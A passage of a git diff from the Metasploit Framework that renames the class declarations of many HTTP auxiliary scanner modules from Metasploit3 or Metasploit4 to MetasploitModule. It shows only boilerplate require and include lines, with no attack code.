MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb index 8816247bf2..d5db9ee957 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb index f2e2ad293a..5651a583a7 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb index ebf3838a7b..5888615617 100644 --- a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb +++ b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index a121331058..e56dd50a64 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 04d650de51..de97da4895 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb index 77ff86171e..33cc413ff2 100644 --- a/modules/auxiliary/scanner/http/ektron_cms400net.rb +++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb index 58be3c1b0c..410769edab 100644 --- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb +++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index d15f58d6b0..2e07b0c82c 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index fd0a168ace..fc17c05f01 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index eccfdbc20d..887ddc0ec2 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb index dade96bb4f..9810b6acaa 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 3bb9ab7c3b..6f3b227141 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index b203939b13..bcc43e883d 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index ffd2f92819..75e4e8bf90 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index a690c8e661..cbaf9fe9d3 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/http/git_scanner.rb b/modules/auxiliary/scanner/http/git_scanner.rb index ee027272ff..4de859464c 100644 --- a/modules/auxiliary/scanner/http/git_scanner.rb +++ b/modules/auxiliary/scanner/http/git_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/gitlab_login.rb b/modules/auxiliary/scanner/http/gitlab_login.rb index 46df091403..7a5283878b 100644 --- a/modules/auxiliary/scanner/http/gitlab_login.rb +++ b/modules/auxiliary/scanner/http/gitlab_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/gitlab' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/gitlab_user_enum.rb b/modules/auxiliary/scanner/http/gitlab_user_enum.rb index e090a1e07c..da37582bf4 100644 --- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb +++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index ee0000161b..44f0e8cd5d 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/goahead_traversal.rb b/modules/auxiliary/scanner/http/goahead_traversal.rb index 2fa77e2376..2a51219b4c 100644 --- a/modules/auxiliary/scanner/http/goahead_traversal.rb +++ b/modules/auxiliary/scanner/http/goahead_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb index 2fde2d1901..a8db31c196 100644 --- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index deea80733c..9de954628f 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb index 3339ef4e3b..0d450d626b 100644 --- a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb index 1acddfa9d5..7521cecfb1 100644 --- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb index bb3859b313..e1051a09d8 100644 --- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb index 81f4519f49..2b3c981d67 100644 --- a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb index c4dbf3e12f..25d6ca9f37 100644 --- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb +++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index 39ff1efbeb..231654fd8d 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index 028e951d5c..10ec7754ba 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index 5d060660b9..17b63d8bad 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb index 20cceac73b..d681ead5f8 100644 --- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb +++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/http_header.rb b/modules/auxiliary/scanner/http/http_header.rb index 0fe42d2b52..d344d683a2 100644 --- a/modules/auxiliary/scanner/http/http_header.rb +++ b/modules/auxiliary/scanner/http/http_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_hsts.rb b/modules/auxiliary/scanner/http/http_hsts.rb index 06b6126bad..18a528107f 100644 --- a/modules/auxiliary/scanner/http/http_hsts.rb +++ b/modules/auxiliary/scanner/http/http_hsts.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index de43931a43..83b0db5bd1 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index baf50cc32c..5bcc5160d5 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 51774421c0..131f326dc9 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 10ac45f37a..2482947127 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index 3fdc6c3755..248222bd78 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require "net/dns/resolver" -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/iis_internal_ip.rb b/modules/auxiliary/scanner/http/iis_internal_ip.rb index ab597f3bc7..22258ad680 100644 --- a/modules/auxiliary/scanner/http/iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb index a4b17dcea8..680b6a8146 100644 --- a/modules/auxiliary/scanner/http/influxdb_enum.rb +++ b/modules/auxiliary/scanner/http/influxdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index 293613c0c2..9a63b5f10e 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ipboard_login.rb b/modules/auxiliary/scanner/http/ipboard_login.rb index 2e32e763ef..6fe82fc2bc 100644 --- a/modules/auxiliary/scanner/http/ipboard_login.rb +++ b/modules/auxiliary/scanner/http/ipboard_login.rb @@ -3,7 +3,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/ipboard' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_status.rb b/modules/auxiliary/scanner/http/jboss_status.rb index 871adfedaa..e4e06b48c5 100644 --- a/modules/auxiliary/scanner/http/jboss_status.rb +++ b/modules/auxiliary/scanner/http/jboss_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index 7c6e5758ab..5f58b1af05 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jenkins_command.rb b/modules/auxiliary/scanner/http/jenkins_command.rb index 87c640e6be..92a1b8f735 100644 --- a/modules/auxiliary/scanner/http/jenkins_command.rb +++ b/modules/auxiliary/scanner/http/jenkins_command.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'cgi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 88db19fbe7..bb2ad6616b 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -11,7 +11,7 @@ require 'rex/proto/http' require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/jenkins_login.rb b/modules/auxiliary/scanner/http/jenkins_login.rb index 66bd139aa9..08e6c34881 100644 --- a/modules/auxiliary/scanner/http/jenkins_login.rb +++ b/modules/auxiliary/scanner/http/jenkins_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/jenkins' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb index 0b355c0e4f..3e5d3b02da 100644 --- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 87894f3c57..79ee38026a 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index 760418ed0a..4e959d20a6 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index 66072a6adb..f281195326 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index dee21277e9..16bb6ec313 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb index 3e280c8ad8..c167a2a28c 100644 --- a/modules/auxiliary/scanner/http/joomla_version.rb +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Joomla include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb index 668cfc4337..63e5630128 100644 --- a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb +++ b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb index 4b232b66dc..1cab8ba1ef 100644 --- a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index bae0916994..fb0bbcdccd 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 8e65e4407c..a558d21ec3 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index 87668dd476..56f51d3877 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb index 69fe63fff8..8623f79753 100644 --- a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb +++ b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 